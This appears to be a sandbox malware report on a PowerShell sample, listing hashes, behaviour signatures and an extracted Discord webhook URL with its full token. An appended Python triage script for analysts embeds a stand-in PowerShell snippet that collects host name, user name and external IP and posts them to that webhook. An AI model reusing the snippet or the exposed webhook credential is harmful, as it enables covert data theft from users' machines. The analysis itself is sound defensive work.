General

  • Target: script.ps1
  • Size: 5KB
  • Sample: 241110-w5564ascrq
  • MD5: 4ea0d3ddf52c65d8aa5ff1b269b69ad6
  • SHA1: ccaf219e952e7f33c181c797d7306b4f41479f52
  • SHA256: 7e4f7184c4eddd2a0779320fd79ef05574649dd63add6fb4b7d5a3ccbfa650e0
  • SHA512: cd3c1f68667323c5c90965bb940931b66297466ef7b0ff0d6b1845df1b29509dcbcdf6feb4b31d13cc96738616fe785f2a3270fb9673aac46eefeee2a9dcd171
  • SSDEEP: 96:T3jL1teXW6VoM3Lb8IRL139temI64JXnBFJYYQHJu8fHDrP8v:T3jLj6WYoM3LbRRveO4JXnrJxQpu8fjA

Score: 10/10

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (exe.dropper):

    https://discord.com/api/webhooks/1305222842962677880/RET1goVsb6NqqkFKByr48S9Q7-9hwIHuCA1z1MRogltLQf8iK73DuFJyXXVx9xoCyzoa

Targets

    • Target: script.ps1
    • Size: 5KB
    • MD5: 4ea0d3ddf52c65d8aa5ff1b269b69ad6
    • SHA1: ccaf219e952e7f33c181c797d7306b4f41479f52
    • SHA256: 7e4f7184c4eddd2a0779320fd79ef05574649dd63add6fb4b7d5a3ccbfa650e0
    • SHA512: cd3c1f68667323c5c90965bb940931b66297466ef7b0ff0d6b1845df1b29509dcbcdf6feb4b31d13cc96738616fe785f2a3270fb9673aac46eefeee2a9dcd171
    • SSDEEP: 96:T3jL1teXW6VoM3Lb8IRL139temI64JXnBFJYYQHJu8fHDrP8v:T3jLj6WYoM3LbRRveO4JXnrJxQpu8fjA

    Score: 8/10

    • Blocklisted process makes network request

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.
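The three signatures describe behaviour, but an analyst handling this sample wants checks that run on the artifact itself: confirm the file on disk is the one the report hashed, pull the network endpoints out of the PowerShell body, separate the Discord webhook (the reporting channel) from the external-IP lookup, and date the webhook from its ID. The following Python is an added example written for this page, not code from the report, the sandbox, or the sample. The PowerShell text inside it is a constructed stand-in, since the page does not reproduce script.ps1; the list of IP lookup hosts is an assumption, because the report says only that "a legitimate IP lookup service" is used. Only the webhook URL and the SHA-256 are taken from the page.

```python
import hashlib
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Constructed stand-in for the script body (the report page does not reproduce
# script.ps1). It only exercises the checks below; its hash will not match the
# report's, which the last check demonstrates.
SAMPLE_PS1 = r'''
$ip = (Invoke-RestMethod -Uri "https://api.ipify.org").Trim()
$msg = "host=$env:COMPUTERNAME user=$env:USERNAME ip=$ip"
$hook = "https://discord.com/api/webhooks/1305222842962677880/RET1goVsb6NqqkFKByr48S9Q7-9hwIHuCA1z1MRogltLQf8iK73DuFJyXXVx9xoCyzoa"
Invoke-RestMethod -Uri $hook -Method Post -ContentType "application/json" -Body (@{content=$msg} | ConvertTo-Json)
'''

# Indicator taken from the report above.
REPORT_SHA256 = "7e4f7184c4eddd2a0779320fd79ef05574649dd63add6fb4b7d5a3ccbfa650e0"

# Assumed list of public external-IP services; the page says only that a
# "legitimate IP lookup service" is used, not which one.
IP_LOOKUP_HOSTS = {
    "api.ipify.org", "icanhazip.com", "ifconfig.me", "ip-api.com",
    "ipinfo.io", "checkip.amazonaws.com",
}

URL_RE = re.compile(r"""https?://[^\s"'<>)]+""")
WEBHOOK_RE = re.compile(
    r"https://(?:[\w.-]+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)"
)
DISCORD_EPOCH_MS = 1420070400000  # 2015-01-01T00:00:00Z


def snowflake_to_unix_ms(snowflake) -> int:
    """Discord IDs are snowflakes: bits 22 and up hold ms since the Discord epoch."""
    return (int(snowflake) >> 22) + DISCORD_EPOCH_MS


def matches_report(data: bytes) -> bool:
    """True only for the exact file the report analysed."""
    return hashlib.sha256(data).hexdigest() == REPORT_SHA256


def triage_script(text: str) -> dict:
    """Extract URLs from a PowerShell body and classify the ones the signatures care about."""
    findings = {"urls": [], "webhooks": [], "ip_lookup": []}
    for url in URL_RE.findall(text):
        findings["urls"].append(url)
        m = WEBHOOK_RE.match(url)
        if m:
            wid, token = m.groups()
            created = datetime.fromtimestamp(snowflake_to_unix_ms(wid) / 1000, tz=timezone.utc)
            findings["webhooks"].append({
                "id": wid,
                "token_prefix": token[:4] + "...",  # the token is a credential; never log it whole
                "created_utc": created.isoformat(timespec="seconds"),
            })
            continue
        host = urlsplit(url).hostname or ""
        if host in IP_LOOKUP_HOSTS:
            findings["ip_lookup"].append(host)
    return findings


if __name__ == "__main__":
    result = triage_script(SAMPLE_PS1)
    for hook in result["webhooks"]:
        print(f"Discord webhook {hook['id']} (token {hook['token_prefix']}) created {hook['created_utc']}")
    print("external-IP lookups:", result["ip_lookup"])
    print("sample matches report SHA-256:", matches_report(SAMPLE_PS1.encode()))
```

Two points worth noting from the output. The webhook ID decodes to a creation time on 2024-11-10, the same day as the sample ID (241110-...), which gives a floor for when this infrastructure was set up. And the webhook URL embeds its token, so the URL is itself a credential: anyone who holds it can post to the channel or remove the webhook through Discord's delete-webhook-with-token endpoint, which is the usual takedown path for this kind of exfiltration channel. Treat it as a secret in tickets and share it only in redacted form. A webhook accepts POSTed messages rather than serving a file, so the extractor's exe.dropper label should be read as a generic config category; the behaviour the signatures describe is collection of the external IP and delivery to the webhook.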
